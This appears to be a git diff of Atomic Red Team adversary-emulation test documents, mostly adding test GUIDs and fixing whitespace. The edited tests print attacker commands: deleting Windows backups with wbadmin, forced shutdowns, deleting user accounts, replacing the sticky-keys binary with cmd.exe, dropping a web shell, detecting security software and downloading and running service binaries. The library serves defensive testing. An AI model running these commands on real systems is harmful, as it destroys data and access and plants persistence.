## Atomic Test #7 - Windows - wbadmin Delete systemstatebackup -Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. +auto_generated_guid: 584331dd-75bc-4c02-9e0b-17f5fd81c748 + +Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. **Supported Platforms:** Windows diff --git a/atomics/T1491.001/T1491.001.md b/atomics/T1491.001/T1491.001.md index ff394927..83a87102 100644 --- a/atomics/T1491.001/T1491.001.md +++ b/atomics/T1491.001/T1491.001.md @@ -10,15 +10,17 @@
## Atomic Test #1 - Replace Desktop Wallpaper -Downloads an image from a URL and sets it as the desktop wallpaper. +auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 + +Downloads an image from a URL and sets it as the desktop wallpaper. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url_of_wallpaper | URL pointing to the image file you wish to set as wallpaper | url | https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png| | pointer_to_orginal_wallpaper | Full path to where a file containing the original wallpaper location will be saved | String | $env:TEMP\T1491.001-OrginalWallpaperLocation| diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md index 39645569..714d567e 100644 --- a/atomics/T1496/T1496.md +++ b/atomics/T1496/T1496.md @@ -14,9 +14,11 @@ Additionally, some cryptocurrency mining malware kills off processes for competi
## Atomic Test #1 - macOS/Linux - Simulate CPU Load with Yes + +auto_generated_guid: 904a5a0e-fb02-490d-9f8d-0e256eb37549 + This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. - **Supported Platforms:** macOS, Linux diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md index 055376e4..86ae11ca 100644 --- a/atomics/T1497.001/T1497.001.md +++ b/atomics/T1497.001/T1497.001.md @@ -22,9 +22,11 @@ Hardware checks, such as the presence of the fan, temperature, and audio devices
## Atomic Test #1 - Detect Virtualization Environment (Linux) + +auto_generated_guid: dfbd1a21-540d-4574-9731-e852bd6fe840 + systemd-detect-virt detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. - **Supported Platforms:** Linux @@ -47,8 +49,10 @@ if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendo
## Atomic Test #2 - Detect Virtualization Environment (Windows) -Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine +auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d + +Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine **Supported Platforms:** Windows @@ -77,8 +81,10 @@ $error.clear()
## Atomic Test #3 - Detect Virtualization Environment (MacOS) -ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software. +auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09 + +ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software. **Supported Platforms:** macOS diff --git a/atomics/T1505.002/T1505.002.md b/atomics/T1505.002/T1505.002.md index 974d261b..7e3386e2 100644 --- a/atomics/T1505.002/T1505.002.md +++ b/atomics/T1505.002/T1505.002.md @@ -12,16 +12,18 @@ Adversaries may register a malicious transport agent to provide a persistence me
## Atomic Test #1 - Install MS Exchange Transport Agent Persistence + +auto_generated_guid: 43e92449-ff60-46e9-83a3-1a38089df94d + Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | class_factory | Class factory of transport agent. | string | Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory| | dll_path | Path of DLL to use as transport agent. | path | c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll| @@ -52,7 +54,7 @@ if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){ ##### Description: Microsoft Exchange SnapIn must be installed ##### Check Prereq Commands: ```powershell -Get-TransportAgent -TransportService FrontEnd +Get-TransportAgent -TransportService FrontEnd ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1505.003/T1505.003.md b/atomics/T1505.003/T1505.003.md index d10a868f..1a3d7bbd 100644 --- a/atomics/T1505.003/T1505.003.md +++ b/atomics/T1505.003/T1505.003.md @@ -12,17 +12,19 @@ In addition to a server-side script, a Web shell may have a client interface pro
## Atomic Test #1 - Web Shell Written to Disk + +auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16 + This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot| | web_shells | Path of Web Shell | path | PathToAtomicsFolder\T1505.003\src\| @@ -48,7 +50,7 @@ del #{web_shell_path}\cmd.aspx /q >nul 2>&1 ##### Description: Web shell must exist on disk at specified location (#{web_shells}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{web_shells}) {exit 0} else {exit 1} +if (Test-Path #{web_shells}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md index 774a3286..230fdbef 100644 --- a/atomics/T1518.001/T1518.001.md +++ b/atomics/T1518.001/T1518.001.md @@ -24,11 +24,13 @@ Adversaries may also utilize cloud APIs to discover the configurations of firewa
## Atomic Test #1 - Security Software Discovery + +auto_generated_guid: f92a380f-ced9-491f-b338-95a991418ce2 + Methods to identify Security Software on an endpoint when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles and specific security software. - **Supported Platforms:** Windows @@ -56,10 +58,12 @@ tasklist.exe | findstr /i cylance
## Atomic Test #2 - Security Software Discovery - powershell + +auto_generated_guid: 7f566051-f033-49fb-89de-b6bacab730f0 + Methods to identify Security Software on an endpoint when sucessfully executed, powershell is going to processes related AV products if they are running. - **Supported Platforms:** Windows @@ -85,9 +89,11 @@ get-process | ?{$_.Description -like "*cylance*"}
## Atomic Test #3 - Security Software Discovery - ps (macOS) + +auto_generated_guid: ba62ce11-e820-485f-9c17-6f3c857cd840 + Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. - **Supported Platforms:** macOS @@ -110,9 +116,11 @@ ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefen
## Atomic Test #4 - Security Software Discovery - ps (Linux) + +auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 + Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. - **Supported Platforms:** Linux @@ -135,10 +143,12 @@ ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|
## Atomic Test #5 - Security Software Discovery - Sysmon Service + +auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 + Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). when sucessfully executed, the test is going to display sysmon driver instance if it is installed. - **Supported Platforms:** Windows @@ -161,10 +171,12 @@ fltmc.exe | findstr.exe 385201
## Atomic Test #6 - Security Software Discovery - AV Discovery via WMI + +auto_generated_guid: 1553252f-14ea-4d3b-8a08-d7a4211aa945 + Discovery of installed antivirus products via a WMI query. when sucessfully executed, the test is going to display installed AV software. - **Supported Platforms:** Windows diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md index 7925bb5f..3dbb4789 100644 --- a/atomics/T1518/T1518.md +++ b/atomics/T1518/T1518.md @@ -16,9 +16,11 @@ Adversaries may attempt to enumerate software for a variety of reasons, such as
## Atomic Test #1 - Find and Display Internet Explorer Browser Version + +auto_generated_guid: 68981660-6670-47ee-a5fa-7e74806420a4 + Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed. - **Supported Platforms:** Windows @@ -41,9 +43,11 @@ reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersio
## Atomic Test #2 - Applications Installed + +auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b + Query the registry to determine software and versions installed on the system. Upon execution a table of software name and version information will be displayed. - **Supported Platforms:** Windows @@ -67,8 +71,10 @@ Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uni
## Atomic Test #3 - Find and Display Safari Browser Version -Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors +auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f + +Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors **Supported Platforms:** macOS diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md index 15aa0390..1a223ec8 100644 --- a/atomics/T1529/T1529.md +++ b/atomics/T1529/T1529.md @@ -28,15 +28,17 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other
## Atomic Test #1 - Shutdown System - Windows -This test shuts down a Windows system. +auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 + +This test shuts down a Windows system. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | timeout | Timeout period before shutdown (seconds) | string | 1| @@ -57,15 +59,17 @@ shutdown /s /t #{timeout}
## Atomic Test #2 - Restart System - Windows -This test restarts a Windows system. +auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 + +This test restarts a Windows system. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | timeout | Timeout period before restart (seconds) | string | 1| @@ -86,15 +90,17 @@ shutdown /r /t #{timeout}
## Atomic Test #3 - Restart System via `shutdown` - macOS/Linux -This test restarts a macOS/Linux system. +auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb + +This test restarts a macOS/Linux system. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | timeout | Time to restart (can be minutes or specific time) | string | now| @@ -115,15 +121,17 @@ shutdown -r #{timeout}
## Atomic Test #4 - Shutdown System via `shutdown` - macOS/Linux -This test shuts down a macOS/Linux system using a halt. +auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de + +This test shuts down a macOS/Linux system using a halt. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | timeout | Time to shutdown (can be minutes or specific time) | string | now| @@ -144,8 +152,10 @@ shutdown -h #{timeout}
## Atomic Test #5 - Restart System via `reboot` - macOS/Linux -This test restarts a macOS/Linux system via `reboot`. +auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 + +This test restarts a macOS/Linux system via `reboot`. **Supported Platforms:** macOS, Linux @@ -168,8 +178,10 @@ reboot
## Atomic Test #6 - Shutdown System via `halt` - Linux -This test shuts down a Linux system using `halt`. +auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd + +This test shuts down a Linux system using `halt`. **Supported Platforms:** Linux @@ -192,8 +204,10 @@ halt -p
## Atomic Test #7 - Reboot System via `halt` - Linux -This test restarts a Linux system using `halt`. +auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e + +This test restarts a Linux system using `halt`. **Supported Platforms:** Linux @@ -216,8 +230,10 @@ halt --reboot
## Atomic Test #8 - Shutdown System via `poweroff` - Linux -This test shuts down a Linux system using `poweroff`. +auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa + +This test shuts down a Linux system using `poweroff`. **Supported Platforms:** Linux @@ -240,8 +256,10 @@ poweroff
## Atomic Test #9 - Reboot System via `poweroff` - Linux -This test restarts a Linux system using `poweroff`. +auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 + +This test restarts a Linux system using `poweroff`. **Supported Platforms:** Linux diff --git a/atomics/T1531/T1531.md b/atomics/T1531/T1531.md index 025c33ba..a5dba7da 100644 --- a/atomics/T1531/T1531.md +++ b/atomics/T1531/T1531.md @@ -16,16 +16,18 @@ Adversaries may also subsequently log off and/or reboot boxes to set malicious c
## Atomic Test #1 - Change User Password - Windows + +auto_generated_guid: 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 + Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with the password "HuHuHUHoHo283283". - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_account | User account whose password will be changed. | string | AtomicAdministrator| | new_user_password | Password to use if user account must be created first | string | User2ChangePW!| @@ -53,15 +55,17 @@ net.exe user #{user_account} /delete >nul 2>&1
## Atomic Test #2 - Delete User - Windows -Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. +auto_generated_guid: f21a1d7d-a62f-442a-8c3a-2440d43b19e5 + +Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | new_user_password | Password to use if user account must be created first | string | User2DeletePW!| | user_account | User account to be deleted. | string | AtomicUser| @@ -84,15 +88,17 @@ net.exe user #{user_account} /delete
## Atomic Test #3 - Remove Account From Domain Admin Group -This test will remove an account from the domain admins group +auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 + +This test will remove an account from the domain admins group **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | super_user | Account used to run the execution command (must include domain). | string | domain\super_user| | super_pass | super_user account password. | string | password| @@ -119,7 +125,7 @@ if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Ad ##### Description: Requires the Active Directory module for powershell to be installed. ##### Check Prereq Commands: ```powershell -if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} +if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1543.001/T1543.001.md b/atomics/T1543.001/T1543.001.md index 9eecc4dd..33f7a5b3 100644 --- a/atomics/T1543.001/T1543.001.md +++ b/atomics/T1543.001/T1543.001.md @@ -12,15 +12,17 @@ Adversaries may install a new launch agent that can be configured to execute at
## Atomic Test #1 - Launch Agent -Create a plist and execute it +auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 + +Create a plist and execute it **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | plist_filename | filename | string | com.atomicredteam.plist| | path_malicious_plist | Name of file to store in cron folder | string | $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist| @@ -42,7 +44,7 @@ sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} ##### Description: The shared library must exist on disk at specified location (#{path_malicious_plist}) ##### Check Prereq Commands: ```bash -if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; +if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index 44951c1c..cbb857ac 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -22,15 +22,17 @@ While adversaries typically require root privileges to create/modify service uni
## Atomic Test #1 - Create Systemd Service -This test creates a Systemd service unit file and enables it as a service. +auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c + +This test creates a Systemd service unit file and enables it as a service. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system| | systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service| @@ -81,8 +83,10 @@ systemctl daemon-reload
## Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service. -This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. +auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 + +This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. **Supported Platforms:** Linux @@ -130,7 +134,7 @@ systemctl daemon-reload ##### Description: System must be Ubuntu ,Kali OR CentOS. ##### Check Prereq Commands: ```bash -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1543.003/T1543.003.md b/atomics/T1543.003/T1543.003.md index 7dfa0832..616ccbd2 100644 --- a/atomics/T1543.003/T1543.003.md +++ b/atomics/T1543.003/T1543.003.md @@ -20,10 +20,12 @@ Services may be created with administrator privileges but are executed under SYS
## Atomic Test #1 - Modify Fax service to run PowerShell + +auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f + This test will temporarily modify the service Fax by changing the binPath to PowerShell and will then revert the binPath change, restoring Fax to its original state. Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. - **Supported Platforms:** Windows @@ -51,16 +53,18 @@ sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
## Atomic Test #2 - Service Installation CMD + +auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 + Download an executable from github and start it as a service. Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService_CMD| @@ -86,7 +90,7 @@ sc.exe delete #{service_name} >nul 2>&1 ##### Description: Service binary must exist on disk at specified location (#{binary_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{binary_path}) {exit 0} else {exit 1} +if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -101,16 +105,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Service Installation PowerShell + +auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 + Installs A Local Service via PowerShell. Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService_PowerShell| @@ -137,7 +143,7 @@ catch {} ##### Description: Service binary must exist on disk at specified location (#{binary_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{binary_path}) {exit 0} else {exit 1} +if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1543.004/T1543.004.md b/atomics/T1543.004/T1543.004.md index cae1c5d4..c8f5977d 100644 --- a/atomics/T1543.004/T1543.004.md +++ b/atomics/T1543.004/T1543.004.md @@ -14,15 +14,17 @@ The plist file permissions must be root:wheel, but the script or program that it
## Atomic Test #1 - Launch Daemon -Utilize LaunchDaemon to launch `Hello World` +auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf + +Utilize LaunchDaemon to launch `Hello World` **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | plist_filename | filename | string | com.atomicredteam.plist| | path_malicious_plist | Name of file to store in cron folder | string | $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist| @@ -43,7 +45,7 @@ sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} ##### Description: The shared library must exist on disk at specified location (#{path_malicious_plist}) ##### Check Prereq Commands: ```bash -if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; +if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1546.001/T1546.001.md b/atomics/T1546.001/T1546.001.md index 14d91955..41cc789d 100644 --- a/atomics/T1546.001/T1546.001.md +++ b/atomics/T1546.001/T1546.001.md @@ -17,17 +17,19 @@ The values of the keys listed are commands that are executed when the handler op
## Atomic Test #1 - Change Default File Association + +auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 + Change Default File Association From cmd.exe of hta to notepad. Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| | extension_to_change | File Extension To Hijack | String | .hta| diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md index 0677ca63..6b340f80 100644 --- a/atomics/T1546.002/T1546.002.md +++ b/atomics/T1546.002/T1546.002.md @@ -19,15 +19,17 @@ Adversaries can use screensaver settings to maintain persistence by setting the
## Atomic Test #1 - Set Arbitrary Binary as Screensaver -This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. +auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 + +This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_binary | Executable binary to use in place of screensaver for persistence | path | C:\Windows\System32\cmd.exe| diff --git a/atomics/T1546.003/T1546.003.md b/atomics/T1546.003/T1546.003.md index 8ea3551c..f94ca7be 100644 --- a/atomics/T1546.003/T1546.003.md +++ b/atomics/T1546.003/T1546.003.md @@ -14,6 +14,9 @@ WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe
## Atomic Test #1 - Persistence via WMI Event Subscription + +auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 + Run from an administrator powershell window. After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. @@ -22,7 +25,6 @@ Code references https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 - **Supported Platforms:** Windows diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md index e45a0307..29f7920d 100644 --- a/atomics/T1546.004/T1546.004.md +++ b/atomics/T1546.004/T1546.004.md @@ -16,15 +16,17 @@ For macOS, the functionality of this technique is similar but may leverage zsh,
## Atomic Test #1 - Add command to .bash_profile -Adds a command to the .bash_profile file of the current user +auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f + +Adds a command to the .bash_profile file of the current user **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py| @@ -45,15 +47,17 @@ echo "#{command_to_add}" >> ~/.bash_profile
## Atomic Test #2 - Add command to .bashrc -Adds a command to the .bashrc file of the current user +auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f + +Adds a command to the .bashrc file of the current user **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_add | Command to add to the .bashrc file | string | /path/to/script.py| diff --git a/atomics/T1546.005/T1546.005.md b/atomics/T1546.005/T1546.005.md index fc801714..7c2f996c 100644 --- a/atomics/T1546.005/T1546.005.md +++ b/atomics/T1546.005/T1546.005.md @@ -12,9 +12,11 @@ Adversaries can use this to register code to be executed when the shell encounte
## Atomic Test #1 - Trap + +auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 + After exiting the shell, the script will download and execute. After sending a keyboard interrupt (CTRL+C) the script will download and execute. - **Supported Platforms:** macOS, Linux diff --git a/atomics/T1546.007/T1546.007.md b/atomics/T1546.007/T1546.007.md index fb98bab9..374d1c09 100644 --- a/atomics/T1546.007/T1546.007.md +++ b/atomics/T1546.007/T1546.007.md @@ -12,15 +12,17 @@ Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code
## Atomic Test #1 - Netsh Helper DLL Registration -Netsh interacts with other operating system components using dynamic-link library (DLL) files +auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d + +Netsh interacts with other operating system components using dynamic-link library (DLL) files **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | helper_file | Path to DLL | Path | C:\Path\file.dll| diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md index e36b7357..69ed5766 100644 --- a/atomics/T1546.008/T1546.008.md +++ b/atomics/T1546.008/T1546.008.md @@ -26,17 +26,19 @@ Other accessibility features exist that may also be leveraged in a similar fashi
## Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes + +auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 + Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_list | Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" | String | osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe| | attached_process | Full path to process to attach to target in #{parent_list}. Default: cmd.exe | Path | C:\windows\system32\cmd.exe| @@ -82,8 +84,10 @@ Foreach ($item in $input_table)
## Atomic Test #2 - Replace binary of sticky keys -Replace sticky keys binary (sethc.exe) with cmd.exe +auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + +Replace sticky keys binary (sethc.exe) with cmd.exe **Supported Platforms:** Windows diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md index 6a34b973..4e7b5e57 100644 --- a/atomics/T1546.010/T1546.010.md +++ b/atomics/T1546.010/T1546.010.md @@ -14,20 +14,22 @@ The AppInit DLL functionality is disabled in Windows 8 and later versions when s
## Atomic Test #1 - Install AppInit Shim + +auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 + AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | registry_file | Windows Registry File | Path | PathToAtomicsFolder\T1546.010\src\T1546.010.reg| | registry_cleanup_file | Windows Registry File | Path | PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg| @@ -51,7 +53,7 @@ reg.exe import #{registry_cleanup_file} >nul 2>&1 ##### Description: Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) ##### Check Prereq Commands: ```powershell -if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} +if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell 
@@ -63,7 +65,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 ##### Description: DLL's must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll)
 ##### Check Prereq Commands:
 ```powershell
